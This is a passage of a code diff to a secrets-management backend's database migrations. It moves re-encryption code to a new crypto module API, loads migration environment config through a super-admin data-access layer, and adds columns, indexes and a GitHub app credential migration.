@ -29,7 +30,9 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const projectEncryptionRingBuffer =
@ -60,20 +63,23 @@ export async function up(knex: Knex): Promise<void> {
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.inputIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.inputTag,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.inputCiphertext
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                iv: el.inputIV,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                tag: el.inputTag,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.inputCiphertext
+              })
          : "";

      const encryptedInput = projectKmsService.encryptor({
--- a/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts
+++ b/backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts
@ -1,10 +1,11 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -23,7 +24,9 @@ export async function up(knex: Knex): Promise<void> {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const projectEncryptionRingBuffer =
@ -53,20 +56,23 @@ export async function up(knex: Knex): Promise<void> {
        // eslint-disable-next-line @typescript-eslint/ban-ts-comment
        // @ts-ignore This will be removed in next cycle so ignore the ts missing error
        el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
-          ? infisicalSymmetricDecrypt({
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              keyEncoding: el.keyEncoding as SecretKeyEncoding,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              iv: el.encryptedDataIV,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              tag: el.encryptedDataTag,
-              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-              ciphertext: el.encryptedData
-            })
+          ? crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                keyEncoding: el.keyEncoding as SecretKeyEncoding,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                iv: el.encryptedDataIV,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                tag: el.encryptedDataTag,
+                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+                ciphertext: el.encryptedData
+              })
          : "";

      const encryptedRotationData = projectKmsService.encryptor({
--- a/backend/src/db/migrations/20250210101842_identity-k8-auth-to-kms.ts
+++ b/backend/src/db/migrations/20250210101842_identity-k8-auth-to-kms.ts
@ -1,10 +1,11 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -54,7 +55,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =
@ -99,19 +102,23 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
      orgEncryptionRingBuffer.push(orgId, orgKmsService);
    }

-    const key = infisicalSymmetricDecrypt({
-      ciphertext: encryptedSymmetricKey,
-      iv: symmetricKeyIV,
-      tag: symmetricKeyTag,
-      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-    });
+    const key = crypto
+      .encryption()
+      .symmetric()
+      .decryptWithRootEncryptionKey({
+        ciphertext: encryptedSymmetricKey,
+        iv: symmetricKeyIV,
+        tag: symmetricKeyTag,
+        keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+      });

    const decryptedTokenReviewerJwt =
      // eslint-disable-next-line @typescript-eslint/ban-ts-comment
      // @ts-ignore This will be removed in next cycle so ignore the ts missing error
      el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
            key,
+            keySize: SymmetricKeySize.Bits256,
            // eslint-disable-next-line @typescript-eslint/ban-ts-comment
            // @ts-ignore This will be removed in next cycle so ignore the ts missing error
            iv: el.tokenReviewerJwtIV,
@ -128,8 +135,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
      // eslint-disable-next-line @typescript-eslint/ban-ts-comment
      // @ts-ignore This will be removed in next cycle so ignore the ts missing error
      el.encryptedCaCert && el.caCertIV && el.caCertTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
            key,
+            keySize: SymmetricKeySize.Bits256,
            // eslint-disable-next-line @typescript-eslint/ban-ts-comment
            // @ts-ignore This will be removed in next cycle so ignore the ts missing error
            iv: el.caCertIV,
--- a/backend/src/db/migrations/20250210101842_identity-oidc-auth-to-kms.ts
+++ b/backend/src/db/migrations/20250210101842_identity-oidc-auth-to-kms.ts
@ -1,10 +1,11 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -34,7 +35,9 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =
@ -71,19 +74,24 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
          );
          orgEncryptionRingBuffer.push(orgId, orgKmsService);
        }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });

        const decryptedCertificate =
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedCaCert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.caCertIV,
--- a/backend/src/db/migrations/20250210101845_directory-config-to-kms.ts
+++ b/backend/src/db/migrations/20250210101845_directory-config-to-kms.ts
@ -1,10 +1,11 @@
 import { Knex } from "knex";

 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -27,7 +28,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =
@ -58,19 +60,24 @@ const reencryptSamlConfig = async (knex: Knex) => {
          );
          orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
        }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });

        const decryptedEntryPoint =
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.entryPointIV,
@ -87,8 +94,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedIssuer && el.issuerIV && el.issuerTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.issuerIV,
@ -105,8 +113,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedCert && el.certIV && el.certTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.certIV,
@ -185,7 +194,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =
@ -216,19 +226,24 @@ const reencryptLdapConfig = async (knex: Knex) => {
          );
          orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
        }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });

        const decryptedBindDN =
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedBindDN && el.bindDNIV && el.bindDNTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.bindDNIV,
@ -245,8 +260,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedBindPass && el.bindPassIV && el.bindPassTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.bindPassIV,
@ -263,8 +279,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedCACert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.caCertIV,
@ -337,7 +354,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
  }

  initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
  const orgEncryptionRingBuffer =
@ -368,19 +386,24 @@ const reencryptOidcConfig = async (knex: Knex) => {
          );
          orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
        }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });

        const decryptedClientId =
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedClientId && el.clientIdIV && el.clientIdTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.clientIdIV,
@ -397,8 +420,9 @@ const reencryptOidcConfig = async (knex: Knex) => {
          // eslint-disable-next-line @typescript-eslint/ban-ts-comment
          // @ts-ignore This will be removed in next cycle so ignore the ts missing error
          el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                key,
+                keySize: SymmetricKeySize.Bits256,
                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                iv: el.clientSecretIV,
--- a/backend/src/db/migrations/20250513081738_remove-gateway-project-link.ts
+++ b/backend/src/db/migrations/20250513081738_remove-gateway-project-link.ts
@ -4,6 +4,7 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 import { TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@ -39,7 +40,8 @@ export async function up(knex: Knex): Promise<void> {
      );

    initLogger();
-    const envConfig = getMigrationEnvConfig();
+    const superAdminDAL = superAdminDALFactory(knex);
+    const envConfig = await getMigrationEnvConfig(superAdminDAL);
    const keyStore = inMemoryKeyStore();
    const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });

--- a/backend/src/db/migrations/20250627010508_env-overrides.ts
+++ b/backend/src/db/migrations/20250627010508_env-overrides.ts
@ -0,0 +1,21 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
+  if (!hasColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
+      t.binary("encryptedEnvOverrides").nullable();
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
+  if (hasColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
+      t.dropColumn("encryptedEnvOverrides");
+    });
+  }
+}
--- a/backend/src/db/migrations/20250630212553_user-latest-invite.ts
+++ b/backend/src/db/migrations/20250630212553_user-latest-invite.ts
@ -0,0 +1,21 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
+  await knex.schema.alterTable(TableName.OrgMembership, (t) => {
+    if (!hasColumn) {
+      t.datetime("lastInvitedAt").nullable();
+    }
+  });
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
+  await knex.schema.alterTable(TableName.OrgMembership, (t) => {
+    if (hasColumn) {
+      t.dropColumn("lastInvitedAt");
+    }
+  });
+}
--- a/backend/src/db/migrations/20250705074703_fips-mode.ts
+++ b/backend/src/db/migrations/20250705074703_fips-mode.ts
@ -0,0 +1,23 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (!hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.boolean("fipsEnabled").notNullable().defaultTo(false);
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.dropColumn("fipsEnabled");
+    });
+  }
+}
--- a/backend/src/db/migrations/20250707162850_last-invited-at-default.ts
+++ b/backend/src/db/migrations/20250707162850_last-invited-at-default.ts
@ -0,0 +1,21 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
+  if (hasColumn) {
+    await knex.schema.alterTable(TableName.OrgMembership, (t) => {
+      t.datetime("lastInvitedAt").nullable().defaultTo(knex.fn.now()).alter();
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
+  if (hasColumn) {
+    await knex.schema.alterTable(TableName.OrgMembership, (t) => {
+      t.datetime("lastInvitedAt").nullable().alter();
+    });
+  }
+}
--- a/backend/src/db/migrations/20250710022434_add-index-for-access-token.ts
+++ b/backend/src/db/migrations/20250710022434_add-index-for-access-token.ts
@ -0,0 +1,46 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+const MIGRATION_TIMEOUT = 30 * 60 * 1000; // 30 minutes
+
+export async function up(knex: Knex): Promise<void> {
+  const result = await knex.raw("SHOW statement_timeout");
+  const originalTimeout = result.rows[0].statement_timeout;
+
+  try {
+    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
+
+    // iat means IdentityAccessToken
+    await knex.raw(`
+          CREATE INDEX IF NOT EXISTS idx_iat_identity_id 
+          ON ${TableName.IdentityAccessToken} ("identityId")
+        `);
+
+    await knex.raw(`
+          CREATE INDEX IF NOT EXISTS idx_iat_ua_client_secret_id 
+          ON ${TableName.IdentityAccessToken} ("identityUAClientSecretId")
+        `);
+  } finally {
+    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const result = await knex.raw("SHOW statement_timeout");
+  const originalTimeout = result.rows[0].statement_timeout;
+
+  try {
+    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);
+
+    await knex.raw(`
+          DROP INDEX IF EXISTS idx_iat_identity_id
+        `);
+
+    await knex.raw(`
+          DROP INDEX IF EXISTS idx_iat_ua_client_secret_id
+        `);
+  } finally {
+    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
+  }
+}
--- a/backend/src/db/migrations/20250710115149_required-path-on-approval-policies.ts
+++ b/backend/src/db/migrations/20250710115149_required-path-on-approval-policies.ts
@ -0,0 +1,55 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
+    .whereNull("secretPath")
+    .orWhere("secretPath", "");
+
+  const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
+    .whereNull("secretPath")
+    .orWhere("secretPath", "");
+
+  // update all the secret approval policies secretPath to be "/**"
+  if (existingSecretApprovalPolicies.length) {
+    await knex(TableName.SecretApprovalPolicy)
+      .whereIn(
+        "id",
+        existingSecretApprovalPolicies.map((el) => el.id)
+      )
+      .update({
+        secretPath: "/**"
+      });
+  }
+
+  // update all the access approval policies secretPath to be "/**"
+  if (existingAccessApprovalPolicies.length) {
+    await knex(TableName.AccessApprovalPolicy)
+      .whereIn(
+        "id",
+        existingAccessApprovalPolicies.map((el) => el.id)
+      )
+      .update({
+        secretPath: "/**"
+      });
+  }
+
+  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
+    table.string("secretPath").notNullable().alter();
+  });
+
+  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
+    table.string("secretPath").notNullable().alter();
+  });
+}
+
+export async function down(knex: Knex): Promise<void> {
+  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
+    table.string("secretPath").nullable().alter();
+  });
+
+  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
+    table.string("secretPath").nullable().alter();
+  });
+}
--- a/backend/src/db/migrations/20250710153448_adjust-approval-request-user-cols.ts
+++ b/backend/src/db/migrations/20250710153448_adjust-approval-request-user-cols.ts
@ -0,0 +1,35 @@
+import { Knex } from "knex";
+
+import { TableName } from "@app/db/schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasCommitterCol = await knex.schema.hasColumn(TableName.SecretApprovalRequest, "committerUserId");
+
+  if (hasCommitterCol) {
+    await knex.schema.alterTable(TableName.SecretApprovalRequest, (tb) => {
+      tb.uuid("committerUserId").nullable().alter();
+    });
+  }
+
+  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
+
+  if (hasRequesterCol) {
+    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
+      tb.dropForeign("requestedByUserId");
+      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  // can't undo committer nullable
+
+  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
+
+  if (hasRequesterCol) {
+    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
+      tb.dropForeign("requestedByUserId");
+      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL");
+    });
+  }
+}
--- a/backend/src/db/migrations/20250711005900_github-app-connection-to-environments.ts
+++ b/backend/src/db/migrations/20250711005900_github-app-connection-to-environments.ts
@ -0,0 +1,68 @@
+import { Knex } from "knex";
+
+import { inMemoryKeyStore } from "@app/keystore/memory";
+import { selectAllTableCols } from "@app/lib/knex";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+
+import { TableName } from "../schemas";
+import { getMigrationEnvConfig } from "./utils/env-config";
+import { getMigrationEncryptionServices } from "./utils/services";
+
+export async function up(knex: Knex) {
+  const existingSuperAdminsWithGithubConnection = await knex(TableName.SuperAdmin)
+    .select(selectAllTableCols(TableName.SuperAdmin))
+    .whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);
+
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+  const keyStore = inMemoryKeyStore();
+  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
+
+  const decryptor = kmsService.decryptWithRootKey();
+  const encryptor = kmsService.encryptWithRootKey();
+
+  const tasks = existingSuperAdminsWithGithubConnection.map(async (admin) => {
+    const overrides = (
+      admin.encryptedEnvOverrides ? JSON.parse(decryptor(Buffer.from(admin.encryptedEnvOverrides)).toString()) : {}
+    ) as Record<string, string>;
+
+    if (admin.encryptedGitHubAppConnectionClientId) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_ID = decryptor(
+        admin.encryptedGitHubAppConnectionClientId
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionClientSecret) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_SECRET = decryptor(
+        admin.encryptedGitHubAppConnectionClientSecret
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionPrivateKey) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY = decryptor(
+        admin.encryptedGitHubAppConnectionPrivateKey
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionSlug) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_SLUG = decryptor(admin.encryptedGitHubAppConnectionSlug).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionId) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_ID = decryptor(admin.encryptedGitHubAppConnectionId).toString();
+    }
+
+    const encryptedEnvOverrides = encryptor(Buffer.from(JSON.stringify(overrides)));
+
+    await knex(TableName.SuperAdmin).where({ id: admin.id }).update({
+      encryptedEnvOverrides
+    });
+  });
+
+  await Promise.all(tasks);
+}
+
+export async function down() {
+  // No down migration needed as this migration is only for data transformation
+  // and does not change the schema.
+}
--- a/backend/src/db/migrations/utils/env-config.ts
+++ b/backend/src/db/migrations/utils/env-config.ts
@ -1,6 +1,8 @@
 import { z } from "zod";

+import { crypto } from "@app/lib/crypto/cryptography";
 import { zpStr } from "@app/lib/zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

 const envSchema = z
  .object({
@ -35,7 +37,7 @@ const envSchema = z

